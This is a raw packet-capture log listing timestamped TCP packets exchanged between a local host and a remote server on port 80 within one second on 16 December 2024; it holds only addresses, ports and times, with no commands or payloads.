                                                            Dec 16, 2024 15:28:02.336771011 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.336816072 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.339368105 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.339425087 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.339441061 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.339478016 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.341950893 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.342006922 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.342009068 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.342061043 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.344602108 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.344630003 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.344655991 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.344666958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.347372055 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.347388983 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.347430944 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.347441912 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.349931955 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.349948883 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.349997044 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.350029945 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.352884054 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.352951050 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.353131056 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.353187084 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.355283022 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.355299950 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.355355024 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.355355024 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.357673883 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.357749939 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.357795954 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.357978106 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.360253096 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.360310078 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.360323906 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.360359907 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.362931013 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.362991095 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.362994909 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.363048077 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.365643024 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.365659952 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.365701914 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.365745068 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.368246078 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.368263960 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.368308067 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.368321896 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.370733976 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.370804071 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.370865107 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.371067047 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.373519897 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.373536110 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.373583078 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.373603106 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.375974894 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.376032114 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.376127958 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.376177073 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.378906965 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.378923893 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.378972054 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.378983974 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.382097006 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.382113934 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.382149935 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.382170916 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.494697094 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.494808912 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.494888067 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.494910955 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.495773077 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.495800972 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.495841980 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.495893955 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.497874975 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.497931957 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.497993946 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.498047113 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.500273943 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.500300884 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.500332117 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.500350952 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.502253056 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.502310991 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.502343893 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.502393961 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.504395962 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.504482031 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.504484892 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.504542112 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.506474972 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.506547928 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.506580114 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.506635904 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.508685112 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.508702040 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.508744001 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.508796930 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.510651112 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.510705948 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.510732889 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.510782957 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.512692928 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.512764931 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.512814045 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.512877941 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.514760971 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.514827013 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.514837980 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.514879942 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.517764091 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.517782927 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.517852068 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.518876076 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.518940926 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.518984079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.519036055 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.521467924 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.521483898 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.521524906 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.521545887 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.522945881 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.523019075 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.523106098 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.523156881 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.525042057 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.525127888 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.525233030 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.525288105 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.527101040 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.527153969 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.527158976 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.527225018 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.529150009 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.529208899 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.529217958 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.529273033 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.531287909 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.531331062 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.531357050 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.531389952 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.533339977 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.533396006 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.533399105 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.533452988 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.535326004 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.535382032 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.535461903 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.535523891 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.537379980 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.537436008 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.537527084 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.537579060 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.539426088 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.539486885 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.539551020 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.539602995 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.541723013 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.541738987 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.541779995 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.541795015 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.543579102 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.543632984 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.543732882 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.543786049 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.545727968 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.545747995 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.545790911 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.545823097 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.548106909 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.548122883 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.548166037 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.548196077 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.549700022 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.549881935 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.549963951 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.550026894 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.551995993 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.552011967 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.552057028 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.552089930 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.554404974 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.554428101 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.554527998 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.555851936 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.555926085 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.556243896 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.556299925 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.557966948 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.558026075 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.558979034 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.559035063 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.560036898 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.560096979 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.560120106 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.560173988 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.562184095 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.562201023 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.562242985 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.562277079 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.564325094 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.564341068 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.564393997 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.564394951 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.566441059 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.566456079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.566509008 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.566534996 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.568577051 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.568593025 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.568638086 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.568669081 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.570689917 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.570704937 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.570763111 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.570795059 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.572566032 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.572582960 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.572645903 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.572674990 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.574448109 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.574528933 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.574529886 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.574589014 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.576581955 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.576672077 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.576699972 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.576723099 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.578540087 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.578598976 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.578789949 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.578838110 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.580676079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.580730915 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.580739021 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.580785990 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.582811117 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.582828045 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.582874060 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.582891941 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.584858894 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.584877014 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.584914923 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.584934950 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.587104082 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.587120056 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.587162018 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.587174892 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.588843107 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.588901043 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.588952065 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.589001894 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.590964079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.591012001 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.591020107 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.591069937 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.594156027 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.594172001 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.594208956 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.594221115 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.595168114 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.595184088 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.595221996 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.595242023 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.597347021 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.597362995 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.597404957 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.597415924 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.599370003 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.599389076 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.599446058 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.599482059 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.601622105 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.601639032 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.601686001 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.603275061 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.603339911 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.686871052 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.686918020 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.686953068 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.686975956 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.688164949 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.688185930 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.688215971 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.688246012 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.689543009 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.689589024 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.689693928 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.689757109 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.691615105 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.691632032 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.691682100 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.691699028 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.693176031 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.693245888 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.693300962 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.693344116 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.695298910 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.695331097 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.695363998 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.695363998 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.696615934 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.696676970 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.696681023 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.696722031 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.698507071 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.698533058 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.698570967 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.698600054 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.700298071 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.700314999 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.700357914 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.700377941 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.701766014 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.701831102 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.701879025 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.701939106 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.703407049 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.703469038 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.703556061 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.703608990 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.705212116 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.705262899 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.705302954 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.705343962 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.706955910 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.706973076 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.707004070 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.707030058 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.708426952 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.708489895 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.708491087 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.708534002 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.710280895 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.710299969 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.710352898 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.710397959 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.711755037 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.711810112 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.711821079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.711867094 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.713321924 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.713370085 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.713449955 CET804977666.63.187.30192.168.2.8
